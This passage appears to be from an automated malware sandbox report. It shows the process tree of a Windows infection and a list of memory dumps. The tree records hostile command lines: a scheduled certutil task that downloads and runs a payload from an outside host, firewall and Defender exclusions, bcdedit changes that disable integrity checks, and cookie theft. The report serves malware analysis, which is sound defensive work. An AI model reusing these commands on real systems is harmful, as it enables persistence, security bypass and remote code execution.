                                                            • C:\Users\Admin\AppData\Local\Temp\D03F.exe
                                                              C:\Users\Admin\AppData\Local\Temp\D03F.exe
                                                              2⤵
                                                              • Executes dropped EXE
                                                              • Checks SCSI registry key(s)
                                                              • Suspicious behavior: MapViewOfSection
                                                              PID:2712
                                                          • C:\Users\Admin\AppData\Local\Temp\D80C.exe
                                                            C:\Users\Admin\AppData\Local\Temp\D80C.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:2416
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:2972
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:2212
                                                          • C:\Users\Admin\AppData\Local\Temp\EA36.exe
                                                            C:\Users\Admin\AppData\Local\Temp\EA36.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:380
                                                            • C:\Users\Admin\AppData\Local\Temp\EA36.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\EA36.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              • Windows security modification
                                                              • Adds Run key to start application
                                                              • Drops file in Windows directory
                                                              • Modifies data under HKEY_USERS
                                                              PID:2096
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                                3⤵
                                                                  PID:1676
                                                                  • C:\Windows\system32\netsh.exe
                                                                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                    4⤵
                                                                    • Modifies data under HKEY_USERS
                                                                    PID:1828
                                                                • C:\Windows\rss\csrss.exe
                                                                  C:\Windows\rss\csrss.exe /15-15
                                                                  3⤵
                                                                  • Drops file in Drivers directory
                                                                  • Executes dropped EXE
                                                                  • Modifies data under HKEY_USERS
                                                                  • Modifies system certificate store
                                                                  PID:2664
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                                    4⤵
                                                                    • Creates scheduled task(s)
                                                                    PID:2672
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                                                                    4⤵
                                                                    • Creates scheduled task(s)
                                                                    PID:1184
                                                                  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Modifies system certificate store
                                                                    PID:3016
                                                                    • C:\Windows\system32\bcdedit.exe
                                                                      C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                                                                      5⤵
                                                                      • Modifies boot configuration data using bcdedit
                                                                      PID:2128
                                                                    • C:\Windows\system32\bcdedit.exe
                                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                                                                      5⤵
                                                                      • Modifies boot configuration data using bcdedit
                                                                      PID:1240
                                                                    • C:\Windows\system32\bcdedit.exe
                                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                                                                      5⤵
                                                                      • Modifies boot configuration data using bcdedit
                                                                      PID:2500
                                                                    • C:\Windows\system32\bcdedit.exe
                                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                                                                      5⤵
                                                                      • Modifies boot configuration data using bcdedit
                                                                      PID:3004
                                                                    • C:\Windows\system32\bcdedit.exe
                                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                                                                      5⤵
                                                                      • Modifies boot configuration data using bcdedit
                                                                      PID:1628
                                                                    • C:\Windows\system32\bcdedit.exe
                                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                                                                      5⤵
                                                                      • Modifies boot configuration data using bcdedit
                                                                      PID:528
                                                                    • C:\Windows\system32\bcdedit.exe
                                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                                                                      5⤵
                                                                      • Modifies boot configuration data using bcdedit
                                                                      PID:2208
                                                                    • C:\Windows\system32\bcdedit.exe
                                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                                                                      5⤵
                                                                      • Modifies boot configuration data using bcdedit
                                                                      PID:2092
                                                                    • C:\Windows\system32\bcdedit.exe
                                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                                                                      5⤵
                                                                      • Modifies boot configuration data using bcdedit
                                                                      PID:1440
                                                                    • C:\Windows\system32\bcdedit.exe
                                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                                                                      5⤵
                                                                      • Modifies boot configuration data using bcdedit
                                                                      PID:1632
                                                                    • C:\Windows\system32\bcdedit.exe
                                                                      C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                                                                      5⤵
                                                                      • Modifies boot configuration data using bcdedit
                                                                      PID:1512
                                                                    • C:\Windows\system32\bcdedit.exe
                                                                      C:\Windows\system32\bcdedit.exe -timeout 0
                                                                      5⤵
                                                                      • Modifies boot configuration data using bcdedit
                                                                      PID:2584
                                                                    • C:\Windows\system32\bcdedit.exe
                                                                      C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                                                                      5⤵
                                                                      • Modifies boot configuration data using bcdedit
                                                                      PID:2420
                                                                  • C:\Windows\system32\bcdedit.exe
                                                                    C:\Windows\Sysnative\bcdedit.exe /v
                                                                    4⤵
                                                                    • Modifies boot configuration data using bcdedit
                                                                    PID:1108
                                                                  • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                                                    4⤵
                                                                      PID:564
                                                              • C:\Users\Admin\AppData\Local\Temp\177.exe
                                                                C:\Users\Admin\AppData\Local\Temp\177.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:2132
                                                                • C:\Users\Admin\AppData\Local\Temp\is-HCB8G.tmp\177.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-HCB8G.tmp\177.tmp" /SL5="$1027A,330470,246784,C:\Users\Admin\AppData\Local\Temp\177.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Modifies system certificate store
                                                                  PID:772
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-705LU.tmp\kkkk.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-705LU.tmp\kkkk.exe" /S /UID=lab212
                                                                    3⤵
                                                                    • Drops file in Drivers directory
                                                                    • Executes dropped EXE
                                                                    • Adds Run key to start application
                                                                    • Drops file in Program Files directory
                                                                    PID:460
                                                                    • C:\Program Files\Windows Defender\HHDHRULZSK\prolab.exe
                                                                      "C:\Program Files\Windows Defender\HHDHRULZSK\prolab.exe" /VERYSILENT
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      PID:528
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-H682N.tmp\prolab.tmp
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-H682N.tmp\prolab.tmp" /SL5="$80278,575243,216576,C:\Program Files\Windows Defender\HHDHRULZSK\prolab.exe" /VERYSILENT
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        • Drops file in Program Files directory
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        PID:2200
                                                                    • C:\Users\Admin\AppData\Local\Temp\2e-a729d-872-dedbc-449979bce8180\Wygulogizha.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\2e-a729d-872-dedbc-449979bce8180\Wygulogizha.exe"
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      PID:980
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\anqo3ewa.4hj\lod.exe & exit
                                                                        5⤵
                                                                          PID:1596
                                                                          • C:\Users\Admin\AppData\Local\Temp\anqo3ewa.4hj\lod.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\anqo3ewa.4hj\lod.exe
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                            PID:460
                                                                            • C:\ProgramData\77ESgb5Vm5jAwXHdGuxgUcKzR.tmp
                                                                              C:\ProgramData\77ESgb5Vm5jAwXHdGuxgUcKzR.tmp
                                                                              7⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:2948
                                                                              • C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
                                                                                8⤵
                                                                                  PID:1988
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yz0b41kw.q2n\privacytools5.exe & exit
                                                                            5⤵
                                                                              PID:2256
                                                                              • C:\Users\Admin\AppData\Local\Temp\yz0b41kw.q2n\privacytools5.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\yz0b41kw.q2n\privacytools5.exe
                                                                                6⤵
                                                                                • Suspicious use of SetThreadContext
                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                PID:2244
                                                                                • C:\Users\Admin\AppData\Local\Temp\yz0b41kw.q2n\privacytools5.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\yz0b41kw.q2n\privacytools5.exe
                                                                                  7⤵
                                                                                  • Checks SCSI registry key(s)
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  PID:1148
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fox1zy2q.2gm\app.exe /8-2222 & exit
                                                                              5⤵
                                                                                PID:2528
                                                                                • C:\Users\Admin\AppData\Local\Temp\fox1zy2q.2gm\app.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\fox1zy2q.2gm\app.exe /8-2222
                                                                                  6⤵
                                                                                  • Drops file in Program Files directory
                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                  PID:1592
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\App Deploy"
                                                                                    7⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:1664
                                                                                  • C:\Program Files (x86)\App Deploy\7za.exe
                                                                                    "C:\Program Files (x86)\App Deploy\7za.exe" e -p31337 winamp-plugins.7z
                                                                                    7⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:1396
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\App Deploy\app.exe" -map "C:\Program Files (x86)\App Deploy\WinmonProcessMonitor.sys""
                                                                                    7⤵
                                                                                      PID:2524
                                                                                      • C:\Program Files (x86)\App Deploy\app.exe
                                                                                        "C:\Program Files (x86)\App Deploy\app.exe" -map "C:\Program Files (x86)\App Deploy\WinmonProcessMonitor.sys"
                                                                                        8⤵
                                                                                        • Drops file in Program Files directory
                                                                                        • Suspicious behavior: LoadsDriver
                                                                                        PID:2040
                                                                                    • C:\Program Files (x86)\App Deploy\7za.exe
                                                                                      "C:\Program Files (x86)\App Deploy\7za.exe" e -p31337 winamp.7z
                                                                                      7⤵
                                                                                      • Drops file in Program Files directory
                                                                                      PID:2256
                                                                                    • C:\Program Files (x86)\App Deploy\app.exe
                                                                                      "C:\Program Files (x86)\App Deploy\app.exe" /8-2222
                                                                                      7⤵
                                                                                        PID:1540
                                                                                        • C:\Program Files (x86)\App Deploy\app.exe
                                                                                          "C:\Program Files (x86)\App Deploy\app.exe" /8-2222
                                                                                          8⤵
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:3056
                                                                          • C:\Users\Admin\AppData\Local\Temp\723.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\723.exe
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:1924
                                                                          • C:\Users\Admin\AppData\Local\Temp\E93.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\E93.exe
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            PID:2460
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                              2⤵
                                                                                PID:1628
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /f /im chrome.exe
                                                                                  3⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:1632
                                                                            • C:\Users\Admin\AppData\Local\Temp\F9DC.tmp.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\F9DC.tmp.exe
                                                                              1⤵
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:2808
                                                                            • C:\Users\Admin\AppData\Local\Temp\FBE0.tmp.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\FBE0.tmp.exe
                                                                              1⤵
                                                                                PID:2732
                                                                              • C:\Users\Admin\AppData\Local\Temp\EB5.tmp.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\EB5.tmp.exe
                                                                                1⤵
                                                                                  PID:3004
                                                                                • C:\Users\Admin\AppData\Local\Temp\14CE.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\14CE.exe
                                                                                  1⤵
                                                                                  • Drops startup file
                                                                                  PID:2904
                                                                                  • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                                                    2⤵
                                                                                    • Suspicious behavior: AddClipboardFormatListener
                                                                                    PID:1544
                                                                                • C:\Users\Admin\AppData\Local\Temp\175F.tmp.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\175F.tmp.exe
                                                                                  1⤵
                                                                                    PID:2124
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1CAD.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\1CAD.exe
                                                                                    1⤵
                                                                                      PID:2400
                                                                                    • C:\Users\Admin\AppData\Local\Temp\2B9C.tmp.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\2B9C.tmp.exe
                                                                                      1⤵
                                                                                        PID:768
                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                        1⤵
                                                                                          PID:2684
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe
                                                                                          1⤵
                                                                                            PID:940

                                                                                          Network

                                                                                          MITRE ATT&CK Enterprise v6

                                                                                          Replay Monitor

                                                                                          Loading Replay Monitor...

                                                                                          Downloads

                                                                                          • memory/380-292-0x0000000001470000-0x0000000001C72000-memory.dmp

                                                                                            Filesize

                                                                                            8.0MB

                                                                                          • memory/380-293-0x0000000000400000-0x0000000000C1B000-memory.dmp

                                                                                            Filesize

                                                                                            8.1MB

                                                                                          • memory/380-290-0x0000000001470000-0x0000000001481000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/380-291-0x0000000000400000-0x0000000000C1B000-memory.dmp

                                                                                            Filesize

                                                                                            8.1MB

                                                                                          • memory/460-325-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

                                                                                            Filesize

                                                                                            9.6MB

                                                                                          • memory/460-326-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

                                                                                            Filesize

                                                                                            9.6MB

                                                                                          • memory/460-327-0x00000000001E0000-0x00000000001E2000-memory.dmp

                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/744-178-0x0000000000210000-0x0000000000211000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/744-189-0x0000000000350000-0x0000000000351000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/744-164-0x0000000073010000-0x00000000736FE000-memory.dmp

                                                                                            Filesize

                                                                                            6.9MB

                                                                                          • memory/744-181-0x0000000000340000-0x000000000034D000-memory.dmp

                                                                                            Filesize

                                                                                            52KB

                                                                                          • memory/744-171-0x00000000012D0000-0x00000000012D1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/768-461-0x0000000073010000-0x00000000736FE000-memory.dmp

                                                                                            Filesize

                                                                                            6.9MB

                                                                                          • memory/768-464-0x00000000020E1000-0x00000000020E2000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/768-462-0x0000000001EF0000-0x0000000001F2E000-memory.dmp

                                                                                            Filesize

                                                                                            248KB

                                                                                          • memory/768-463-0x00000000020A0000-0x00000000020DC000-memory.dmp

                                                                                            Filesize

                                                                                            240KB

                                                                                          • memory/768-471-0x00000000020E4000-0x00000000020E6000-memory.dmp

                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/768-460-0x0000000001F80000-0x0000000001F91000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/768-466-0x00000000020E3000-0x00000000020E4000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/768-465-0x00000000020E2000-0x00000000020E3000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/772-311-0x0000000000240000-0x0000000000241000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/796-113-0x0000000003690000-0x0000000003B3F000-memory.dmp

                                                                                            Filesize

                                                                                            4.7MB

                                                                                          • memory/852-85-0x000007FEFC121000-0x000007FEFC123000-memory.dmp

                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/908-130-0x0000000010000000-0x0000000010057000-memory.dmp

                                                                                            Filesize

                                                                                            348KB

                                                                                          • memory/908-135-0x0000000000060000-0x0000000000061000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/912-193-0x0000000000860000-0x0000000000861000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/912-191-0x0000000073010000-0x00000000736FE000-memory.dmp

                                                                                            Filesize

                                                                                            6.9MB

                                                                                          • memory/912-198-0x00000000048F0000-0x00000000048F1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/920-81-0x0000000010000000-0x000000001033E000-memory.dmp

                                                                                            Filesize

                                                                                            3.2MB

                                                                                          • memory/968-319-0x0000000000400000-0x000000000048C000-memory.dmp

                                                                                            Filesize

                                                                                            560KB

                                                                                          • memory/968-317-0x0000000000400000-0x000000000048C000-memory.dmp

                                                                                            Filesize

                                                                                            560KB

                                                                                          • memory/980-384-0x0000000001FA6000-0x0000000001FC5000-memory.dmp

                                                                                            Filesize

                                                                                            124KB

                                                                                          • memory/980-358-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

                                                                                            Filesize

                                                                                            9.6MB

                                                                                          • memory/980-359-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

                                                                                            Filesize

                                                                                            9.6MB

                                                                                          • memory/980-364-0x0000000001FA0000-0x0000000001FA2000-memory.dmp

                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/1040-245-0x0000000000400000-0x0000000000415000-memory.dmp

                                                                                            Filesize

                                                                                            84KB

                                                                                          • memory/1040-244-0x0000000000020000-0x0000000000033000-memory.dmp

                                                                                            Filesize

                                                                                            76KB

                                                                                          • memory/1040-240-0x0000000000C90000-0x0000000000CA1000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/1076-45-0x0000000000400000-0x0000000000983000-memory.dmp

                                                                                            Filesize

                                                                                            5.5MB

                                                                                          • memory/1076-50-0x0000000000400000-0x0000000000983000-memory.dmp

                                                                                            Filesize

                                                                                            5.5MB

                                                                                          • memory/1084-2-0x00000000761F1000-0x00000000761F3000-memory.dmp

                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/1148-172-0x0000000000060000-0x0000000000061000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1148-192-0x00000000047E0000-0x00000000047E1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1148-177-0x00000000002D0000-0x00000000002D1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1148-183-0x0000000000410000-0x0000000000411000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1148-184-0x0000000001DA0000-0x0000000001DB1000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/1148-393-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                            Filesize

                                                                                            48KB

                                                                                          • memory/1148-182-0x0000000004010000-0x0000000004041000-memory.dmp

                                                                                            Filesize

                                                                                            196KB

                                                                                          • memory/1148-162-0x0000000073010000-0x00000000736FE000-memory.dmp

                                                                                            Filesize

                                                                                            6.9MB

                                                                                          • memory/1164-128-0x0000000000250000-0x0000000000252000-memory.dmp

                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/1164-119-0x000007FEF18A0000-0x000007FEF223D000-memory.dmp

                                                                                            Filesize

                                                                                            9.6MB

                                                                                          • memory/1164-131-0x000007FEF18A0000-0x000007FEF223D000-memory.dmp

                                                                                            Filesize

                                                                                            9.6MB

                                                                                          • memory/1184-111-0x0000000001110000-0x0000000001111000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1184-114-0x000000001B3A0000-0x000000001B3A2000-memory.dmp

                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/1184-106-0x000007FEF5950000-0x000007FEF633C000-memory.dmp

                                                                                            Filesize

                                                                                            9.9MB

                                                                                          • memory/1188-180-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1188-170-0x0000000073010000-0x00000000736FE000-memory.dmp

                                                                                            Filesize

                                                                                            6.9MB

                                                                                          • memory/1188-115-0x0000000003410000-0x00000000038BF000-memory.dmp

                                                                                            Filesize

                                                                                            4.7MB

                                                                                          • memory/1188-173-0x0000000000040000-0x0000000000041000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1188-179-0x0000000000330000-0x0000000000336000-memory.dmp

                                                                                            Filesize

                                                                                            24KB

                                                                                          • memory/1224-48-0x000007FEF6740000-0x000007FEF69BA000-memory.dmp

                                                                                            Filesize

                                                                                            2.5MB

                                                                                          • memory/1280-68-0x0000000000140000-0x0000000000141000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1280-69-0x0000000000130000-0x000000000014B000-memory.dmp

                                                                                            Filesize

                                                                                            108KB

                                                                                          • memory/1280-42-0x0000000002540000-0x00000000026DC000-memory.dmp

                                                                                            Filesize

                                                                                            1.6MB

                                                                                          • memory/1280-58-0x0000000001F00000-0x0000000001FEF000-memory.dmp

                                                                                            Filesize

                                                                                            956KB

                                                                                          • memory/1356-287-0x0000000003990000-0x00000000039A7000-memory.dmp

                                                                                            Filesize

                                                                                            92KB

                                                                                          • memory/1356-227-0x00000000026C0000-0x00000000026D6000-memory.dmp

                                                                                            Filesize

                                                                                            88KB

                                                                                          • memory/1356-406-0x0000000005D50000-0x0000000005D67000-memory.dmp

                                                                                            Filesize

                                                                                            92KB

                                                                                          • memory/1356-340-0x0000000003D80000-0x0000000003D96000-memory.dmp

                                                                                            Filesize

                                                                                            88KB

                                                                                          • memory/1464-60-0x0000000000260000-0x00000000002A5000-memory.dmp

                                                                                            Filesize

                                                                                            276KB

                                                                                          • memory/1464-57-0x0000000002EA0000-0x0000000002EB1000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/1468-141-0x0000000000B60000-0x0000000000B62000-memory.dmp

                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/1468-139-0x000007FEF18A0000-0x000007FEF223D000-memory.dmp

                                                                                            Filesize

                                                                                            9.6MB

                                                                                          • memory/1468-140-0x000007FEF18A0000-0x000007FEF223D000-memory.dmp

                                                                                            Filesize

                                                                                            9.6MB

                                                                                          • memory/1540-407-0x0000000003850000-0x0000000003861000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/1540-410-0x0000000000400000-0x0000000000C77000-memory.dmp

                                                                                            Filesize

                                                                                            8.5MB

                                                                                          • memory/1540-409-0x0000000003850000-0x00000000040AD000-memory.dmp

                                                                                            Filesize

                                                                                            8.4MB

                                                                                          • memory/1540-408-0x0000000000400000-0x0000000000C77000-memory.dmp

                                                                                            Filesize

                                                                                            8.5MB

                                                                                          • memory/1544-451-0x0000000000B40000-0x0000000000B51000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/1572-51-0x0000000000100000-0x000000000010D000-memory.dmp

                                                                                            Filesize

                                                                                            52KB

                                                                                          • memory/1572-59-0x0000000003F50000-0x0000000004022000-memory.dmp

                                                                                            Filesize

                                                                                            840KB

                                                                                          • memory/1612-297-0x000000007EF30000-0x000000007EF31000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1612-324-0x0000000006360000-0x0000000006361000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1612-272-0x0000000000C30000-0x0000000000C31000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1612-275-0x0000000004A90000-0x0000000004A91000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1612-279-0x0000000002720000-0x0000000002721000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1612-298-0x0000000005730000-0x0000000005731000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1612-281-0x0000000002722000-0x0000000002723000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1612-303-0x0000000005790000-0x0000000005791000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1612-304-0x0000000005930000-0x0000000005931000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1612-282-0x0000000000E20000-0x0000000000E21000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1612-285-0x0000000005360000-0x0000000005361000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1612-270-0x0000000073010000-0x00000000736FE000-memory.dmp

                                                                                            Filesize

                                                                                            6.9MB

                                                                                          • memory/1652-154-0x0000000000140000-0x0000000000141000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1652-156-0x0000000000150000-0x0000000000151000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1652-155-0x0000000000360000-0x0000000000393000-memory.dmp

                                                                                            Filesize

                                                                                            204KB

                                                                                          • memory/1652-151-0x000007FEF46E0000-0x000007FEF50CC000-memory.dmp

                                                                                            Filesize

                                                                                            9.9MB

                                                                                          • memory/1652-159-0x000000001A9A0000-0x000000001A9A2000-memory.dmp

                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/1652-152-0x0000000000DE0000-0x0000000000DE1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1656-278-0x0000000000020000-0x000000000002D000-memory.dmp

                                                                                            Filesize

                                                                                            52KB

                                                                                          • memory/1656-271-0x0000000000C00000-0x0000000000C11000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/1664-400-0x0000000000ED0000-0x0000000000ED1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1664-405-0x0000000002950000-0x0000000002951000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1664-399-0x0000000073010000-0x00000000736FE000-memory.dmp

                                                                                            Filesize

                                                                                            6.9MB

                                                                                          • memory/1664-404-0x0000000001290000-0x0000000001291000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1664-401-0x00000000049F0000-0x00000000049F1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1664-403-0x00000000028F2000-0x00000000028F3000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1664-402-0x00000000028F0000-0x00000000028F1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

